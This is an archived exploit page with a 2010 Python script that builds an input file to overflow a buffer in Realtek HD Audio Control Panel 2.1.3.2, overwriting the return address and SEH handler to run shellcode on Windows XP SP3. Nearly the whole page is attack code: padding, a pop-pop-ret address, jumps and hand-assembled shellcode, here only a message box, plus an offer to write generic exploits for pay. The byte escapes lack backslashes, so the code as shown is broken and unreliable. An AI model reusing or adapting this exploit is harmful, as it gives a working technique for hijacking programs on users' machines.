Realtek HD Audio Control Panel 2.1.3.2 Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Realtek HD Audio Control Panel 2.1.3.2 Exploit
# Published : 2010-11-14
# Author : BraniX
# Previous Title : Mp3-Nator 2.0 Buffer Overflow Exploit (SEH)
# Next Title : Realtek Audio Microphone Calibration 1.1.1.6 Exploit

# done by BraniX <branix@hackers.org.pl>
# www.hackers.org.pl
# found: 2010.08.24
# tested on: Windows XP SP3 Home Edition
# SafeSEH bypass

# App. has classic buffer overflow vulnerability
# it can be triggered by passing a too long argument 
# as a startup parameter. Shellcode can by run via classic
# ret overwrite or SEH Handler overwrite ... so it's a mini-combo ;)

# Ps. If you need a generic exploit ...
# (no hardcoded VA'a), write it yourself ;) or 'donate few' $$$ 
# we will c0de it for You ^^

filepath = "C:\ShellCode\RTHDCPL 2.1.3.2 - Exploit.bin"
f = open(filepath, "wb")

f.write('A'*4)
f.write('x5E')                     # pop esi
f.write('x5E')                     # pop esi
f.write('xC3')                     # ret
f.write('x90')                     # nop

f.write('[BraniX]')
f.write('A'*448)                    # mock

f.write('xEBx06')                 # jmp +6
f.write('x90')                     # nop
f.write('x90')                     # nop

f.write('x70x01xA5x01')         # pop; pop; ret; address

f.write('x83xC1x0C')             # add ecx, 0Ch
f.write('x88x01')                 # mov byte ptr [ecx], al
f.write('x83xE9x08')             # sub ecx, 08
f.write('x50')                     # push eax
f.write('x51')                     # push ecx
f.write('x51')                     # push ecx
f.write('x50')                     # push eax
f.write('xE8xC5x08x27x7E')     # call user32.MessageBoxA

f.write('x50')                     # push eax
f.write('xE8xE7xCBx6Ex7C')     # call kernel32.ExitProcess

f.write('xCC'*1500)                # int 3's

f.close()

print "Done ..."